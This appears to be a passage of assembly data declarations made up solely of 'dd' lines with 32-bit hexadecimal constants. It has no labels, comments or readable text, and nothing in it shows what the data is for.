dd 0E9C28851h, 30C19629h, 0B1514A7Ch, 87009C97h, 0EBFE75F2h
dd 8E075060h, 0B13E2907h, 0F27A7489h, 0F6BA2FE4h, 0AD8DAE8h
dd 0FEFC2991h, 0BA45E270h, 0CC6070BEh, 10419916h, 0EBEAAF95h
dd 45CB6162h, 770116Ch, 660C565h, 373DDFBh, 48872C2h, 6EB31317h
dd 286205Eh, 81F4BE1Ch, 4E11AD06h, 0D441142Ch, 1237A8B0h
dd 0CA58352Ah, 1E517161h, 0CFF8B0CDh, 88B012h, 2D03C643h
dd 18C00914h, 2DB8C3D7h, 3922F88Dh, 499F014Ch, 0DD4F28D0h
dd 56154856h, 183F53D2h, 327FE1ECh, 91B10719h, 16EE4F17h
dd 0D6CA487Eh, 92C5E2B8h, 7A103D58h, 3B3F5E4Ah, 0D456A9D4h
dd 53100061h, 0C3BCE147h, 0E4102CEh, 0B5903777h, 3F6DFE7Ah
dd 6C91C8B4h, 701ECA53h, 4952F3F6h, 0FDCE978Dh, 88C50B42h
dd 0A914BB90h, 0BD4C19D6h, 4344292Ah, 22A1280Eh, 0C1543160h
dd 542C18F5h, 2F3E22A3h, 0DE2F5408h, 943E133Eh, 7BA09C18h
dd 64D59860h, 0CDD778AAh, 0ED35B40Eh, 9321C58Bh, 0EA07E00Dh
dd 8A196406h, 0A1604FC0h, 191E5830h, 38D0274Ah, 4DA36C7h
dd 0C48A2227h, 0A4AF9BFCh, 575702CBh, 9FCD84FDh, 0AD11E466h
dd 277C659Fh, 3C575EFFh, 1542674Ah, 4086BD97h, 44179B17h
dd 6E461BF0h, 358C40Eh, 25535F01h, 0C6F5FFEh, 51576029h
dd 1DF68962h, 2312A6ECh, 0EBC028FBh, 7231648Bh, 0D1A1B140h
dd 389366FBh, 0BDFB84A0h, 0A9D7BF03h, 0FA7AA420h, 0D681F8D4h
dd 4607E0EEh, 1C1A1880h, 2E94C056h, 55A45624h, 0A87E107Ch
dd 2033C313h, 3F6B322Eh, 7E0CB6B7h, 0B30EE8F8h, 55FFDF45h
dd 2C83E851h, 0F869F365h, 0CA6FA019h, 0CF8849Eh, 0F4AFD048h
dd 561E9DF4h, 58C4BEA9h, 0D3BA090Ch, 0E5497AEEh, 5D1BEFD2h
dd 42576830h, 0BA9BB0BAh, 9DD1D214h, 34956F54h, 5D004427h
dd 72EB403Dh, 87277151h, 0DB911355h, 0D1B6F97Ch, 0D144BF0h
dd 12907D28h, 0CA02543Bh, 3C06CCF5h, 3462BBA1h, 4FE15AC8h
dd 0A685216h, 66221797h, 952C2204h, 336502D9h, 0DAC2D28Bh
dd 10E4985Eh, 315144E5h, 0C76453D7h, 0E83D2C09h, 38A2221Eh
dd 0E0483F40h, 3145E2CDh, 37409D3Dh, 256ACE5Eh, 0BA31D388h
dd 18E722C6h, 0E9D88AAh, 62CBACFEh, 6DBC0C90h, 5F08CAF8h
dd 63DE910Fh, 4A110F40h, 1761AC36h, 76214681h, 5D2540BDh
dd 91433BEFh, 12406A0Ah, 0B5851FE3h, 8CEDF45Dh, 9D6CCF3Bh
dd 2B1063A2h, 462ED12Eh, 0F6C33054h, 0EFF190B5h, 0B6736F9Ch
dd 46117697h, 0F62CB0A3h, 7128AE9Ah, 27554754h, 789607F4h
dd 0ED58D91h, 0E09A52ADh, 8CCEA6Bh, 697196EFh, 0EBC4AB4Bh
dd 0BC669A25h, 0CC08319Ch, 0CE873A1Eh, 0BBA296A2h, 4B94B970h
dd 9A765AA1h, 931748A0h, 6B26A0AFh, 0C7D1A440h, 0C6BBA7BFh
dd 9FBD2459h, 6BAB5AD4h, 22DA8DC8h, 11F9248h, 0E80B5497h
dd 0FD990449h, 0CD8B5D61h, 860FE492h, 43F08200h, 600AC17Fh
dd 14315552h, 7E660C2Dh, 6B667D64h, 8AECAFC1h, 30082F28h
dd 23F81544h, 0D09A7900h, 0FB8042E7h, 0E50000A5h, 0A308020Fh
dd 6A550CFFh, 0E94C1AE5h, 0E160EC8Ah, 0BE829EFFh, 9472397Ch
dd 42FF47CFh, 0CEB3650Ch, 0DD130B02h, 164BB699h, 0B33B1E18h
dd 0DA4BFF7h, 89AAAF64h, 8BEA5221h, 45003599h, 2301AE1h
dd 0DD949610h, 0B92042A6h, 25042ED4h, 7B08BF68h, 3061B07Ah
dd 0A52570B8h, 225B7C81h, 4D0216C8h, 358E0684h, 0F1685F23h
dd 15464333h, 1DE02F80h, 190AE785h, 9E08012Ch, 7283A1A0h
dd 892FDAE2h, 7420B2ACh, 762EE762h, 20186AF5h, 1A5064ECh
dd 6B5719E8h, 867808D3h, 1DC0599Eh, 28AA04B8h, 20701F54h
dd 4A161C52h, 7C193D18h, 14C32111h, 0DF65BBA0h, 0E82FAEC4h
dd 7A72A311h, 593EFED9h, 416ABC1Ch, 290B1AB3h, 3BCCB05Ah
dd 0D3C4D2ABh, 0A7471641h, 8E5DD424h, 11D6FF2h, 699FCAF3h
dd 3CC4FE2Fh, 448FE98h, 241C125Eh, 65656DAAh, 0E9C6B72Ch
dd 0AAC04CDAh, 957C4CFh, 0D030E168h, 9C214181h, 60788705h
dd 954CF442h, 0BFD9C5D1h, 0E00C03C0h, 0EC17D17Eh, 303E4210h
dd 0FC89BF43h, 6C5D7FFDh, 83FF1629h, 906CD7C1h, 8AE840AEh
dd 0A6850F3Ch, 71E6AE1Fh, 207C2705h, 0D4B2AAF6h, 0A33E2C4Ch
dd 21BEF3E1h, 8AFA02A7h, 0EDB4401Ah, 0DC3A311Fh, 72D8AE7Bh
dd 0CFB7D7CDh, 19120BCCh, 680A4375h, 8E346559h, 0CE23116Ah
dd 0F104EE00h, 0F0550A08h, 21DD5BC7h, 92FA30C0h, 2D64E3C1h
dd 0D0C6846Dh, 1DE132B2h, 6F16912Dh, 0D2EA7C2Ah, 0E041ECDFh
dd 30062EE6h, 6E42364Dh, 4B5B7BECh, 0E9075307h, 1E4C284Ah
dd 0DDE3A831h, 0FDBDB095h, 0EB816590h, 559A3781h, 1968DAA1h
dd 1C08BB5h, 0C2E25275h, 0BEF897CBh, 20C14183h, 0C40014A5h
dd 0D72E8DAEh, 7D85B6ABh, 84E2C5D1h, 4A851BBCh, 7BBC69BDh
dd 0AC5D4413h, 27A53538h, 318294DEh, 4DCABA92h, 0E425D994h
dd 0C002943Ch, 0FADD1374h, 3770ABFDh, 2EDD6281h, 9C29B11Fh
dd 0BE2B6DE4h, 0A973035Ch, 2B94DC12h, 15017DF8h, 5CC4C86Bh
dd 225DC19Bh, 55EFA9CCh, 0FDC67DF0h, 701D645Eh, 9CB90731h
dd 80B9D2E4h, 8C272381h, 483A1F9Eh, 0D064EB6Ch, 0B922264Bh
dd 1D739352h, 7AF99130h, 9818081h, 0ACBCB8DAh, 0F9169A95h
dd 0DFC40147h, 3656FEA2h, 0CB2EE7E2h, 3BEF892Ah, 0FDB7856Bh
dd 11F34633h, 4832A8B7h, 7C09D2ABh, 0EBA18985h, 18413F95h
dd 0F4A0AFB1h, 2BA16566h, 0BAFC6660h, 0C88775FFh, 0C3580033h
dd 0D477814Ah, 0A3539725h, 1F0004A6h, 43710D1Ch, 681AA256h
dd 0E0C2D6BAh, 2052EE22h, 96322EE0h, 56CDA3Bh, 159C9FFFh
dd 480630ABh, 1C033C12h, 935401BCh, 19CF018h, 68CA47BCh
dd 0BD18FC45h, 75EF508Eh, 6D928018h, 0ED6E7425h, 0D888B6Bh
dd 128260FCh, 0EA325346h, 0E9D96909h, 6EACC801h, 4E3DD283h
dd 68340734h, 0A9E2880Ah, 8FA3440h, 7C648ADEh, 0CA37C69Ah
dd 0AAA26AB8h, 0AEF02419h, 0C55995E5h, 4E84EADFh, 0CB9A5E2Bh
dd 95674CF9h, 32683Fh, 62847C39h, 0F53218A8h, 0B45C8ABBh
dd 0C54F1263h, 8448C2C9h, 8BAC037Dh, 4DA3D719h, 0B4DA4B71h
dd 1653D008h, 0DD701F58h, 0C397AABBh, 0F20C765Eh, 0E8FFC772h
dd 3E0B2BDAh
dd 0BE792013h, 0CEE48FB2h, 8D6FDE45h, 37455950h, 0F8062F0Bh
dd 0E0081A32h, 0FE28028Bh, 814B7E12h, 0DEAE0E01h, 5F969C5h
dd 23056729h, 151C451h, 63980391h, 43A3F01h, 0F3600311h
dd 5F510AE7h, 401E0905h, 2750E65h, 0F4F97FF3h, 2E3753AAh
dd 490565E4h, 3B18B45Dh, 0DEB89431h, 594392C9h, 988C49F6h
dd 0FC51483Eh, 0A04A461h, 0EBA8A929h, 5DCA14D2h, 9AE9A2CAh
dd 5E393C25h, 0BE1F1106h, 5DB0C922h, 7598B19Fh, 0FFDC9DA9h
dd 3714404Ch, 7B482300h, 9751465Ch, 452F8017h, 2850B1E0h
dd 45487892h, 4B0742C1h, 2466817h, 950BE116h, 7709B63Fh
dd 0A30B448Dh, 1FC5DAEDh, 0C604C8E2h, 2C48C12h, 0B4EA96B9h
dd 0D8D480DCh, 0BBAC8FA8h, 0FBDE7184h, 0FFDCC85h, 9C4FB96Eh
dd 0A537FF54h, 2BC692CFh, 2290F94Eh, 1644B5F0h, 88253E08h
dd 3B6C2734h, 5822F60Bh, 29A282FCh, 50D8A125h, 7C96795Dh
dd 86121F87h, 3D308A72h, 9CE2946h, 0CBBC522Dh, 0CEECEBF0h
dd 838B10B7h, 823EC8B0h, 0B6EA62F2h, 0CA330D4Ah, 128D6260h
dd 0B33BF661h, 0FA6A0403h, 0F5C20445h, 276E61DEh, 484ACCC2h
dd 0DDE72E17h, 0A70586D3h, 204AC4BAh, 0AF755662h, 894E6761h
dd 71008830h, 6E078262h, 13BF84C8h, 1CFA635Eh, 84048DD2h
dd 97C62097h, 0D41831F7h, 0E5D69A82h, 380F167Ah, 641ADC65h
dd 6F09412Ah, 0E0B25F33h, 1B6E611Bh, 97A5A37Dh, 40FDA02Bh
dd 0E464D1C4h, 7A0D37F0h, 0C551B23Fh, 0A8979B7h, 6F96978Bh
dd 0C80C5684h, 48E77F17h, 0EE0B4718h, 0B2165B2h, 515C7995h
dd 92B3C722h, 0A395CF21h, 62FDA020h, 777A8994h, 32381429h
dd 0E2176EF9h, 7163973Dh, 37EB49E0h, 0EA17BC63h, 0EE685223h
dd 0A8EC0C6Ch, 0B5F611A8h, 5D14DD21h, 0A3F6351h, 356A1AA2h
dd 0C53A099Fh, 0D2E8C455h, 5A3834BFh, 5A9EEF18h, 442245DDh
dd 0DFE58217h, 0AFE10351h, 0F44AD929h, 8AC8127Bh, 3D0DCD8Ch
dd 477E2EE0h, 5F68A23h, 97D100AFh, 6F6000FCh, 0BE4065FFh
dd 63E06625h, 8D5039CEh, 0C860B180h, 0CC4B015h, 0A21011C1h
dd 8581269h, 555C6638h, 602B5F03h, 5B42782Dh, 50075DE4h
dd 45280EC1h, 70020A0h, 3DB4A99h, 989C0A0Bh, 334EBD95h
dd 0BFB82F60h, 88DA5A00h, 4ABF93BCh, 0EE733A80h, 8EF2A64Ch
dd 211D8E26h, 5DE57A5Ah, 0CF4242C4h, 0E24006C1h, 0A05C188Ah
dd 1D14C495h, 0BA459DE5h, 0A48BC625h, 2715002Bh, 8B5207E8h
dd 0AC07F7D4h, 439B2145h, 5611A06Bh, 92318820h, 24440188h
dd 69BB6842h, 69AB0C9Fh, 37337B01h, 0AF4717F0h, 0C5CA51B8h
dd 0BF410FD4h, 10833F89h, 8D2D0032h, 8026B551h, 0B3B210D5h
dd 0B138E2E0h, 0B18C7114h, 874DD8A2h, 0F1B8442Eh, 72EFBAFDh
dd 3151E8E8h, 888D9B61h, 0A0F42D8h, 0FA5E069Ch, 0F689B22Ch
dd 0A3D9A593h, 0A9D51C82h, 0BE5F81C5h, 0AC0DD5D8h, 669BEF71h
dd 87E1A2E9h, 2DA6F0FEh, 17303DEFh, 27720CCh, 7D31D7F5h
dd 67F8C7B9h, 28215452h, 92BC1C6Ch, 170F482Eh, 306D77h
dd 5091DB72h, 1A05FBEEh, 948663FCh, 0AA41431Bh, 54EA8375h
dd 650527Ch, 0BD851E2Ah, 0B2FC322Eh, 6560EABh, 20EB466h
dd 21FDA037h, 0C68E6543h, 0A983B72Fh, 0C09067DBh, 0FB19082Ch
dd 0F84FABB0h, 48280C96h, 4053B6A0h, 10C18C43h, 7E124B41h
dd 7A60625Eh, 0E0C021FBh, 0EC01C81Dh, 76216E90h, 0EC15A834h
dd 44138A58h, 22A82F5Ch, 41190C5Dh, 3AA19204h, 0E11CC418h
dd 13B6427Ah, 7D746C20h, 180EFB70h, 0C33EDC6Eh, 33E49F64h
dd 9317B00Dh, 8DC2CA40h, 6A075529h, 5A904381h, 719BD035h
dd 4A2160FFh, 0D131BC30h, 7AE1C2EBh, 0D022C290h, 3A97F83Fh
dd 22211F44h, 0F182A8B6h, 3BE7EB81h, 0B8BCC283h, 0C95FDCB8h
dd 0FB036A8Bh, 1EB55A5h, 9708C5CEh, 3EB3BCA8h, 0E342BBF9h
dd 6947CD07h, 23B8AEC5h, 0B158B85Dh, 0DDED3BFDh, 2A4880C5h
dd 99550FB5h, 0D50D1D0Eh, 9608B9FAh, 4C9D5F04h, 0D9C1D550h
dd 7056CD55h, 0D26326C1h, 268734ECh, 0CB0D17C7h, 0CACEE07Fh
dd 0A10923E9h, 1ED1A1F1h, 0B0DD6C4Dh, 0C3B68B0Bh, 2B7D0ADDh
dd 0F1CA72C1h, 4357F57Ah, 15D0B881h, 2BA1C485h, 0CA92BF0Ah
dd 648A1760h, 47B8C4C7h, 2270BC9Dh, 0CC22F050h, 7551EA11h
dd 0E0524ABDh, 0C4985149h, 425E16BAh, 2E7F8D4Ch, 0AA0BBED8h
dd 230E10C5h, 88AE1408h, 56DDE7AFh, 5FE283BBh, 8EB7426Eh
dd 6A64CD21h, 4573F557h, 91FC75ABh, 0C7155868h, 0DDC14221h
dd 0E673296Bh, 0C6704F51h, 771A00ABh, 92CF144Eh, 190F0503h
dd 0BF01FF76h, 7AD64C27h, 115F89B9h, 6DAC763Dh, 2523EF59h
dd 717687E1h, 0E395C368h, 1DA6C6D0h, 13F867F9h, 4F627D2Ah
dd 0ABB59B55h, 3F0C605Fh, 580BCCD4h, 0C033BA7Eh, 36EBEFB9h
dd 438D9E96h, 709EFC5h, 6A37AEC6h, 0F0E22FBh, 7CC8FC04h
dd 4798DFFh, 0D7C9EF28h, 61E00476h, 760A9834h, 0AE55C6ECh
dd 3B283567h, 0D49F8AA3h, 9F5AD280h, 83150061h, 3AC8077h
dd 3B8E80CEh, 68E2289h, 9EA589CCh, 0D92CAB48h, 7583C470h
dd 0AFF804F9h, 0F8CB8521h, 78204660h, 0BD378341h, 1E1C82DCh
dd 4355BC45h, 6F34A1A1h, 0A0D8C6E4h, 0C1E0A0DAh, 31A493F0h
dd 0D59B8814h, 0A095121Ah, 2B401731h, 0BAA83930h, 8EE254Ah
dd 57EC4213h, 99032B50h, 2813EE02h, 0DBEC8EC1h, 0EFFBBE0Dh
dd 59A22E37h, 438F5E18h, 0CDC2A5F5h, 540A6E7Fh, 6949082h
dd 0AB8A4BBAh, 9C213820h, 0CB99694Ah, 0CBDA5718h, 94E66797h
dd 520721EDh, 0FC826AA5h, 3AA10643h, 3B54B826h, 9055E6DCh
dd 0A6F852D1h, 9B8A09D4h, 0C57E0C2Dh, 75FB4F1Dh, 7EFCF143h
dd 0EDDD4145h, 88456F9Bh, 0D4900D02h, 2B6A5D47h, 9C5F3AE2h
dd 6630BD35h, 55DC615Eh, 2F2B9460h, 7EFEE217h, 1C8DB862h
dd 0A0E67A5Ch, 6B2AD52Dh, 3EA6BF5Bh, 82BEC33h, 0FF761DFCh
dd 0CCA3AF73h, 1E9EB42Dh, 0CEF1BC46h, 0AD0BADD0h, 0D5B63757h
dd 5DBD1793h, 837AFFFh, 1B820B84h, 40403D49h, 9388B8BDh
dd 99A3D3BAh, 4047A34h, 33849A37h, 99E21083h, 0FD16861h
dd 0B7D4A00h, 0B65357E2h, 287E8828h, 94022860h, 0D7E81945h
dd 0A092ED03h, 54F73388h, 3715F24Fh, 47314BECh, 13204C8Ch
dd 0A55A04B2h, 23CE66F4h, 0E2F8408Ah, 1334C461h, 0FDC71C33h
dd 75A24F37h, 235C646Bh, 5266E47h, 0EE49FD1Dh, 0BCFAF63Ah
dd 47A82D81h, 0BA58E60Eh, 607724Ah, 0C54D9759h, 0F671F6C6h
dd 0CB2A315Eh, 0C55E5D24h, 0D3DAFB71h, 5E3E2963h, 0AFE8A2A9h
dd 23150416h, 151122E0h, 95989E3Ch, 0C220D8B1h, 0BC0425EFh
dd 0EF8B570Dh, 6F9E2F6Ch, 0E2D3573Fh, 0D82CE27h, 6EBD6805h
dd 5D6B4090h, 0B84C3994h, 136A4071h, 0B6DE8BA5h, 0DFADCC2Bh
dd 40612D10h, 42FD9BECh, 0D36B68Ch, 31CD7340h, 2F01098Ch
dd 95007507h, 894B3288h, 0F9670E38h, 89C7FCEh, 0F8048108h
dd 7613C4B7h, 770A57Ch, 11454E83h, 0B7DD9A70h, 0C5C1FC15h
dd 89F34039h, 186AE7B7h, 2EB062CDh, 0FC781A59h, 0D9D2F0AEh
dd 0B1B7CACDh, 6F03B541h, 6626EA85h, 110B7FFCh, 85A4A133h
dd 872DC1FDh, 0DCD6A42Ah, 4617FFC5h, 0C78828F0h, 72557B07h
dd 712D52CFh, 0EABA12B1h, 754B1440h, 6C55CD78h, 1D406143h
dd 9A6BAC8h, 328E0DB7h, 5E31D134h, 0DED33475h, 0F8FC5DC0h
dd 83BD212Ah, 90A580C5h, 104EBF10h, 9B75A6C6h, 67511C42h
dd 9B02EC07h, 33E02828h
dd 7C178B43h, 1A2A522Ah, 0BF34F68Fh, 0E561C627h, 26E148F8h
dd 69424DDDh, 0FB983333h, 0DDEE613Bh, 0C41A9455h, 9E8DA4C1h
dd 0BB2C78ACh, 44EAD580h, 0A09A4E7Ch, 7A0FB4C5h, 5E5DA287h
dd 1968F2F9h, 8ED1BD2h, 0A321D82Eh, 0DF92F04Ch, 0B97022C1h
dd 2CE88E30h, 314638B8h, 182F711Ch, 9B8B628h, 0F933A504h
dd 95EB4912h, 7B8AA613h, 29C3E085h, 836122A3h, 0BE017D2Eh
dd 0ACD74A70h, 4388E30Bh, 566EF487h, 61D0455h, 9F40A2F5h
dd 18BC0170h, 78BA1961h, 348E07E1h, 0E0E88DDAh, 5D239F29h
dd 0A7513995h, 3D18568Ch, 1BECD399h, 0A5F64FF7h, 11F50810h
dd 0EAB96583h, 1A1D0BE7h, 966CFC6Bh, 88EDBAD5h, 0B8F677BFh
dd 68BB445h, 0ABA5245Eh, 0D457E0B8h, 7B4688C9h, 0D17900F3h
dd 7CAC4102h, 456F576Bh, 0C368B35Ah, 0C95C00EBh, 856335A2h
dd 6A31895h, 6310070Dh, 22A53A1Ch, 180350E4h, 74338324h
dd 0D6E8ED59h, 56F27952h, 2946228Dh, 0D5CEB899h, 1D1F71E8h
dd 137E04F4h, 0F524C273h, 31718A35h, 0F89750ABh, 0D3C4DF47h
dd 4F462241h, 7AE2E194h, 0E241D265h, 0E31A041Fh, 0B1505970h
dd 9701E42Ch, 7D31C072h, 454149DBh, 94E8346Bh, 5C947AB9h
dd 6C0BD154h, 7201EB17h, 0EC5142A7h, 7FA88FFEh, 70166746h
dd 0FE9C5CC3h, 0FD082179h, 0C3754ABBh, 0BD46D8BFh, 0C1E26B9h
dd 7CC3E765h, 0A2286FB1h, 3E694A75h, 39CBAD48h, 0AE9322EAh
dd 17A56384h, 0A79BAAB3h, 3EA0B142h, 0A2AF728Ch, 7B820361h
dd 0A7417705h, 60DEF383h, 0C6790D62h, 0ECDB84Bh, 6BEE33FBh
dd 5FC9C05Dh, 0F1ED1541h, 458A19B5h, 8F8396C9h, 0AA92E3F6h
dd 0C22B809Ch, 28D2C90Fh, 0B845E47h, 258945F1h, 369EB40Eh
dd 44DAB4D1h, 572726D4h, 2308909Bh, 0A697AA4Fh, 99A4B2E0h
dd 0EC98EB43h, 0CABA6AAEh, 0EE62E1C4h, 3D70628Bh, 81092E0Eh
dd 78C28AEh, 0B0797EB6h, 0EDC88C29h, 0CAE06ACCh, 890C8475h
dd 0C8DDFB9Eh, 0CF91C1CFh, 0F956445Dh, 514A917Ah, 0A2E556CDh
dd 6F7EB15Fh, 62750625h, 57940328h, 82EB5D66h, 0BA7DC006h
dd 0FAA0095Ah, 3B67A08Ah, 0BC795135h, 0AE4E3BCAh, 0B0040215h
dd 25E5B5A3h, 0F7305A3Bh, 2671C548h, 88D80DCCh, 453911ADh
dd 12D139E8h, 5D22285Eh, 6844ADFFh, 24BC0A1h, 0BC69350Dh
dd 38006232h, 0A36E4934h, 78288A06h, 0AAAA035Ch, 0B0637369h
dd 8FECE688h, 7DC2079Bh, 0D398E168h, 4D50394Bh, 44D938Fh
dd 836B73C2h, 0B164DAB5h, 309DB900h, 346C5907h, 87686621h
dd 0B82221C2h, 456E610Ch, 95195B11h, 29A5B0F3h, 4EA8C98h
dd 2CA2596Dh, 3341F402h, 0AE94CE5Eh, 5726D884h, 1B4785B1h
dd 668389A9h, 0CFF0C5D9h, 2A6EA8D1h, 6369B746h, 0CFACA8BDh
dd 0F1E2A0B9h, 5277C0D7h, 0D50E559Bh, 1D5DDEB9h, 6908281h
dd 51F10F64h, 7FFE1BF4h, 0F7F7D8A9h, 3EB88A99h, 950DE60Ch
dd 0E43E5D3Bh, 12B13381h, 40472124h, 227383F0h, 0BFC54D8h
dd 0C03E1323h, 0F06DDB19h, 0E182DC83h, 0F60AF046h, 126392ECh
dd 0E0D9419h, 216D891Bh, 8AF9F4A1h, 0F9C52B44h, 7AFAA4AFh
dd 4B159FDDh, 0CD632CA4h, 0D052455Dh, 0E31710B2h, 0ACFABBFDh
dd 8439FF11h, 599FE2AEh, 3F882A0Ah, 0D0452417h, 31937F48h
dd 36AB245Eh, 40EAF826h, 0C93FF8B5h, 44B85516h, 5AF7855Bh
dd 0E2FE358Ah, 452C3739h, 0B5005852h, 0D41912DEh, 2986ABC1h
dd 629BA7CAh, 6F92BF00h, 0DF05F955h, 9A85CA70h, 0DBA1A9FAh
dd 58B8507h, 0AEF027B4h, 968352EAh, 0D1145CEBh, 0F56AAE59h
dd 0D8A8B86Bh, 0C1E93B64h, 0D95E4A07h, 0C18AA1C9h, 9C96E41h
dd 0E2172541h, 22376DF3h, 0AA1B9ED4h, 406C7865h, 660B5808h
dd 1B54CA24h, 3BE4441Fh, 123E3AB3h, 828346F8h, 0B4590ABAh
dd 7E26C6A8h, 0C26E06DCh, 218FE10Ah, 2F2A7F13h, 0F5472E26h
dd 46E8ABC7h, 7CED123Bh, 0CE98F597h, 73459579h, 0AABA5795h
dd 94D86531h, 9374AB7Bh, 18EA842Fh, 0DE832CE3h, 6DA4D926h
dd 491CB3ADh, 15E418DAh, 0BA49549Ah, 3C482B07h, 4C55CBA9h
dd 75E7D55Bh, 8AF86962h, 225EB941h, 80A7EEF0h, 18BF62E7h
dd 0B558697h, 0A10182EBh, 40B26443h, 576A8E72h, 0CA05E909h
dd 0E2F83895h, 7872F7ECh, 0E8E12AACh, 0A09786Ah, 0E7D66FEFh
dd 7D2BD839h, 34C90938h, 5389A8F6h, 0D043B220h, 26022B68h
dd 0FC4DC19h, 5D34C8FEh, 8337B86Ah, 7496328Dh, 0ED4E24BEh
dd 156E6DABh, 0AFE21C36h, 76D8D507h, 6F81D4A4h, 7A7CBDB1h
dd 13C12AAEh, 185DF2F1h, 0E9BAAA1h, 0BEDED79Ch, 542DD20Ch
dd 24136565h, 0BE773027h, 0BEAE908Ch, 90A02AEh, 0F5C9B21Dh
dd 0CF3ABAAh, 0F8EAD362h, 8FF2BF1h, 0A15C8C69h, 30BCD38h
dd 83A3FA4Eh, 95AD5D5Eh, 91750493h, 0EABAABEFh, 0EC632788h
dd 0DD8D6D4Ah, 6B4EACA1h, 0EC629A35h, 76EB63CAh, 0FB6371FDh
dd 0E88E5461h, 0D3633F0Eh, 46D543D5h, 6F4C4F5Dh, 3020A75h
dd 5025AEFFh, 2B5EB2Ch, 9AA2AAEAh, 357465F4h, 0A8F2E75Fh
dd 169F0DA0h, 7B562CF2h, 55DB1554h, 52B9C6E7h, 0BC73ED68h
dd 671566B3h, 1F24635Bh, 0E357DC66h, 116A5319h, 99D9683Ah
dd 32C888BEh, 9B5366Fh, 600A93BAh, 0C5414490h, 0A2AA295h
dd 6B36DCE9h, 0A300B422h, 0DD62A17Ah, 0AFDEAA88h, 7B118424h
dd 0CF201037h, 836371D6h, 2DC855E5h, 32AC1F88h, 0EB009A98h
dd 13952A40h, 84612805h, 5685BB43h, 9730F943h, 0B27A5C14h
dd 53658AE2h, 6C6468D4h, 0E2E1DBF6h, 0C77AEBABh, 0B401A357h
dd 2D8EEB24h, 7A45428Bh, 0FACC635h, 839255F9h, 0FA1001B3h
dd 0C3B48192h, 0E7290303h, 20CA147Fh, 44A08812h, 0D11AC580h
dd 62203C37h, 1450B8Eh, 1900E57h, 0C36C5130h, 0C782E0C4h
dd 65A38043h, 418BDB00h, 1684E222h, 7C988684h, 90AE39ADh
dd 0F649A40Fh, 43304C8Fh, 211B2BA8h, 0F8E03FA2h, 7C137258h
dd 0AA954527h, 29B01EA6h, 12EA787Bh, 857F8294h, 0C975E808h
dd 0E707D2BBh, 39CF954Fh, 608BDF0Fh, 6320B4F2h, 0EC3AFD73h
dd 0C5C33445h, 0B4089BF0h, 0C87EA92Bh, 0CB5049Fh, 726317A6h
dd 0E26A3C6Ch, 0D56F8B89h, 7E0BBF42h, 0DB84E00Ch, 0ED908127h
dd 3FA80F0Bh, 6565D38h, 596C252Bh, 0C5D27F76h, 0CA422B5Ah
dd 2040CECEh, 14582EB4h, 6717902Bh, 0FAF10B9Ch, 1413CAE9h
dd 435CB4C8h, 3FD0EE62h, 8DA0DC51h, 9F5C9BACh, 4AF06391h
dd 6737731Bh, 0C40E30D3h, 4ACC0AA1h, 0A5AAB064h, 56C011DCh
dd 20656D4Eh, 9AD2907Fh, 61403E98h, 4215EAC1h, 0A52319A9h
dd 765ACDC1h, 39E35D16h, 0E8D5BBF8h, 486568DBh, 8093663Ch
dd 0C1016B00h, 0C219C1FDh, 4EFBB160h, 162C4BAFh, 7E18D768h
dd 0F584A890h, 4C1AD89Dh, 2BC31412h, 1716ED5Dh, 2057082Ch
dd 906FB40Ah, 0F8BE07FBh, 0DDF791A2h, 6E8D5F4Fh, 2070EB48h
dd 0A6956153h, 0AE354BA9h, 0F801498Fh, 0D5D88DA5h, 64418F68h
dd 0B6B00DD0h, 9F510011h, 0B0302926h, 9036614h, 0C0058420h
dd 0AF7AF8EEh, 207674CAh, 4558CBACh, 8F86A1F8h, 0D12F2A08h
dd 24523619h, 1725982h, 4EA5BC03h, 8BAD6806h, 0A0AD3B04h
dd 0C3FF8314h, 11A388A6h, 7392DC15h, 0A7C42063h, 0A258E02Fh
dd 286C021Ch, 2632A2A3h, 2F350EACh, 84C066Ah, 0A42511AAh
dd 2BCC60C4h, 2008E20Ah, 6F514DC3h, 5C343BA4h, 4614BC23h
dd 0C4E825F4h, 0D248C220h, 0D5719307h, 82CEF87Fh, 0D456B8F9h
dd 0D428566h, 83AE2FBBh
dd 5AC390DBh, 3FDA6753h, 0F86AC47h, 0A443A11Eh, 0AFAA1F03h
dd 0FFD60581h, 33D99D47h, 0D4216200h, 8BA07284h, 74C1007Fh
dd 36C4418h, 93FDE931h, 0B0584585h, 2F248A1h, 0EE8B64E6h
dd 0FC09B720h, 0FA52413h, 0A9B866AFh, 2182D165h, 0E051165Ch
dd 0C7DDD809h, 0C072105Dh, 3F1596E5h, 95F25B94h, 223E5BBAh
dd 6A44163Dh, 0A953CA89h, 0EE955177h, 57C4E82h, 1657E086h
dd 0EDBEE0Ah, 38386826h, 2044088Ah, 2C4C8E20h, 0D2B79906h
dd 7278F5A8h, 12A75FAFh, 359D7A17h, 0F85D4780h, 3E045B6Eh
dd 0AC1F6698h, 0E27741F4h, 2A099280h, 0A8EACA85h, 0E3062FA4h
dd 31B0DF35h, 5AFEE403h, 1861E5A2h, 8138D148h, 873DA38h
dd 0D8C446D5h, 0DD0B5DE0h, 8A25D18Ch, 0B395AA0h, 0C4569204h
dd 54322D0Ah, 7F81A8C3h, 7769EB12h, 0E0E94ABBh, 899FEBCDh
dd 0E178C211h, 62C43B84h, 88B28C7h, 0F760306h, 68AFAA07h
dd 0C4393398h, 0B598D915h, 0A1A267Dh, 1F9C825Ch, 0D25DAB59h
dd 0C24C5F0Eh, 0FE28CC44h, 0D15A1116h, 315BF8Ah, 29570420h
dd 4198FE90h, 0D8E95FA3h, 0A9A0BFDBh, 8711C1F3h, 9FA05E61h
dd 0A96C1A2Fh, 1B97A5FCh, 6499F13h, 13552370h, 0E86BDFEBh
dd 0BE7FFE5Dh, 10A33112h, 541C07D3h, 0F1FF4829h, 0F62B1D23h
dd 0DC872B88h, 71317C58h, 0F7BBF007h, 0BF0021h, 0AA10D405h
dd 0F47C00Fh, 2F004378h, 1A2ABC42h, 978B6B05h, 50584DD7h
dd 14581147h, 31F63EAAh, 35D0DA7Ch, 4A56A0Ah, 72C96A94h
dd 2A8BD069h, 32B49EA2h, 0A350A9BCh, 3FDCDD8Ah, 14ACA72h
dd 4E3B1C27h, 0C26F9B11h, 98597581h, 0D5F71045h, 5665C913h
dd 0E51DE948h, 863D17F0h, 0A99F45CCh, 0CF2894CBh, 5751167Dh
dd 8BF0A75Eh, 72937B38h, 2E9F7D48h, 0F9BEEFA6h, 0DFC7FCC1h
dd 9CB41499h, 4881B7Ch, 0F90F891Fh, 41E782B5h, 5F14C755h
dd 12C0EDC3h, 0AC72CA28h, 814BFB2Eh, 7F363CAh, 0E0CACEE7h
